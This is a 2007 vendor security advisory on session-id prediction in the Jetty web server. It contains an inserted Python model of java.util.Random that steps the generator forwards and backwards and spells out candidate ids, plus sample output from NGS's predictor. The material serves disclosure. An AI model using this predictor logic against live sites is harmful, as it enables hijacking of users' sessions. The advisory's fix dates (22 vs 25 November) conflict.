=======
Summary
=======

Name: Jetty Session Id Prediction
Release Date: 5 February 2007
Reference: NGS00471
Discoverer: Chris Anley
Vendor: Mortbay
Systems Affected: Jetty prior to versions 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3
Risk: High
Status: Fixed

========
TimeLine
========

Discovered: 17 November 2006
Reported: 22 November 2006
Fixed: 25 November 2006
Published: 5 February 2007

===========
Description
===========

Versions of Jetty, the popular Java web server, are vulnerable to a session id prediction attack. Jetty uses java.util.Random to generate session ids. The internal state of this generator can be easily discovered, leading to an attacker being able to hijack existing and future sessions.

=================
Technical Details
=================

java.util.Random implements a linear congruential generator of the following form (48 bits of state; each call returns the top "bits" bits of the new state):

    synchronized protected int next(int bits) {
        seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);
        return (int)(seed >>> (48 - bits));
    }

Jetty generates a 64-bit session id by generating two 32-bit numbers in this way, so we end up with an encoded 64-bit integer. By decoding the integer and splitting it into its two component 32-bit integers, we can easily brute-force the generator's internal state. Once the state is discovered, the generator can be run both forwards and backwards, so an attacker can determine previously generated session ids, as well as session ids that have not yet been generated. This allows the attacker to hijack any existing session, and perform any actions that the original user of the session could perform.

Obviously the severity of this issue varies from application to application, but we believe it warrants at least a "high" risk rating.

NGS have developed proof of concept code for this issue that implements a session predictor for this bug. It takes a session id as input and outputs candidates for the next 5 and previous 5 session ids.
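The generator quoted above and the radix-30 to 36 spelling of each id, modelled in Python as an added example (this is neither the NGS proof-of-concept code nor Jetty's own implementation): given the 48-bit state held just before an id was drawn, the state is stepped backwards and forwards to regenerate neighbouring ids, and each 64-bit value is written out in the seven radices. The helper names, the sample state and the treatment of the value's sign are assumptions, not details from the advisory.

```python
# Added example (not the NGS PoC): java.util.Random's 48-bit LCG modelled in Python, stepped both ways.
MULT, ADD, MASK48 = 0x5DEECE66D, 0xB, (1 << 48) - 1
INV_MULT = pow(MULT, -1, 1 << 48)  # MULT is odd, hence invertible modulo 2^48
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def step_forward(state):
    """One next() transition: seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1)."""
    return (state * MULT + ADD) & MASK48

def step_backward(state):
    """Undo one transition: the affine map is a bijection on 48-bit values."""
    return ((state - ADD) * INV_MULT) & MASK48

def next_bits(state, bits):
    """Model of next(bits): advance, then return the top `bits` bits of the new state."""
    state = step_forward(state)
    return state, state >> (48 - bits)

def next_long(state):
    """Model of nextLong(): ((long)next(32) << 32) + next(32), as a signed 64-bit value."""
    state, hi = next_bits(state, 32)
    state, lo = next_bits(state, 32)
    lo_signed = lo - (1 << 32) if lo >= 1 << 31 else lo  # next(32) yields a signed int
    value = ((hi << 32) + lo_signed) & ((1 << 64) - 1)
    if value >= 1 << 63:
        value -= 1 << 64
    return state, value

def to_radix(value, radix):
    """Non-negative value as lowercase digits in `radix` (what Long.toString prints)."""
    digits = ""
    while value:
        value, d = divmod(value, radix)
        digits = DIGITS[d] + digits
    return digits or "0"

def candidates(value):
    """Seven spellings of one id: Jetty picks radix 30..36 from the millisecond (sign handling assumed)."""
    return [to_radix(abs(value), r) for r in range(30, 37)]

def session_ids_around(state, before=5, after=5):
    """From the state held just before the current id was drawn, list ids at offsets -before..after."""
    s = state
    for _ in range(before):
        s = step_backward(step_backward(s))  # rewind one nextLong() = two next(32) calls
    ids = []
    for offset in range(-before, after + 1):
        s, value = next_long(s)
        ids.append((offset, candidates(value)))
    return ids
```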
It is necessary to output 7 candidate session ids for each iteration because Jetty encodes the session id in a number base from 30 to 36 depending on the millisecond in which the session id was generated. The underlying 64-bit integer is the same, just represented in bases 30-36.

Here is some example output:

    H:\jetty_rand\Debug>jetty_rand.exe g4sse9e7fs5ee
    Radix: 30
    Found seed: 5346772124980067
    Session -5: 27s4jsk03074k 1gbb661e0l6mp 11ctqbu24shqo nqqa46cv6ovh h4xlr7d8n98c cg9x29g6vfna 9568uhp0c7yw
    Session -4: 586o97hbtkkis 3h9o0c9eglm5q 2dpgen12bekgo 1mf3ar81r4e7d 15vq2mdv83nmo t13aedmjm4ts lamwq2jurlzs
    Session -3: c2kqln033ior 8d98tft18mgj 5u715san1m0b 47rifnwhompl 31pb1t2496ef 27mbqm91n0gc 1mksf8xjn6kr
    Session -2: h5n7ft13ak1nr biif83e4tlq37 7tj3f6tclak5h 5fpk27ulvu2nu 3s5vpubx7ekc9 2om684eem9iy2 1xf0lar1nqpwx
    Session -1: 66isdajhm658g 463l7trqe65oo 2rodl8h2bjkb4 1wdl0j3wqr6tj 1d3hc9k0gm9ja y8hj85q65rxq p49erbpgioo4
    Session 0: g4sse9e7fs5ee as3iaiqcjo82g 7eeb56egthkrm 54w87w5wtpwfk 3kdimj6vemoce 2iybbcyacjqk9 1t9qijf82uk52

The issue affects a great many products that are based on Jetty, such as Apache Geronimo:

http://geronimo.apache.org/

The latest version (2.0) of Geronimo is not vulnerable to this issue. Version 1.1 and prior are vulnerable, however, and this issue can be used to hijack a session to the administrative console.

A further 98 projects based on Jetty are listed on the Jetty website at:

http://www.mortbay.com/powered.html

===============
Fix Information
===============

This issue was fixed in the source code on the 22nd of November 2006, less than 6 hours after it was reported. The issue is fixed in released versions 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3.
The changes can be viewed here:

http://fisheye.codehaus.org/changelog/jetty/?cs=1274

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070